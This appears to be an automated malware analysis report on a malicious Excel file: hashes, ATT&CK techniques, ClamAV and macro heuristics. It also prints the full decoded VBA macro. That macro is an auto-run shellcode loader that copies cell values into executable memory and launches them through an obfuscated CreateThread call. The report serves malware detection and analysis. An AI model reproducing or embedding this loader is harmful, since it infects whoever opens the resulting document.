Office (OOXML) malware analysis — malicious · 0c0eac554bcc7b1f

MALICIOUS

Office (OOXML)

16.4 KB Created: 2021-10-18 14:56:53 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-10-27

MD5: dfb6e808296f997d55ddf995e2e12e1d SHA-1: 921df8662f36ec13e2296f36f9f1309b81fc3b10 SHA-256: 0c0eac554bcc7b1fb9a0f7c6ec24bd0ea6a0b6bb98dfc14ee641ae010f828071

164 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Excel document containing VBA macros, specifically triggering AutoOpen and Workbook_Open events. The VBA code attempts to allocate memory and then uses the CreateThread API to execute arbitrary code, likely a second-stage payload. This is further supported by ClamAV detections indicating a downloader.

Heuristics 5

ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
        Auto_Open
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
End Sub
Sub Workbook_Open()
        Auto_Open
```

Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro

Matched line in script

Sub Auto_Open()
        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1804 bytes
SHA-256: `6e873772df33264493d318b9e7d191aebdcb6398a57c629d1e257185eb61f286`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Function VBA_Evaluate(Input_String As String) Application.Volatile VBA_Evaluate = Application.Evaluate(Input_String) End Function Sub Auto_Open() Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long #If VBA7 Then Dim Xlbufvetp As LongPtr #Else Dim Xlbufvetp As Long #End If n = Range("A1", Range("A1").End(xlDown)).Rows.Count ReDim Hyeyhafxp(n) For i = 0 To n Hyeyhafxp(i) = Range("A1").Offset(i, 0) Next i Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40) For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp) Wyzayxya = Hyeyhafxp(Zolde) Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1) Next Zolde Dim p1 As String, p2 As String, p3 As String, p4 As String, p5 As String p1 = "Cr" p2 = "ea" p3 = "teT" p4 = "hre" p5 = "ad" VBA_Evaluate (p1 & p2 & p3 & p4 & p5 & "(0, 0, " & Xlbufvetp & ", 0, 0, 0)") End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	19968 bytes
SHA-256: `25f1e128fb3c50264e33bfe921938fdea4a971a63c2fee0ba374492b62b9bcd3`
Detection ClamAV: Doc.Downloader.Generic-6698421-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.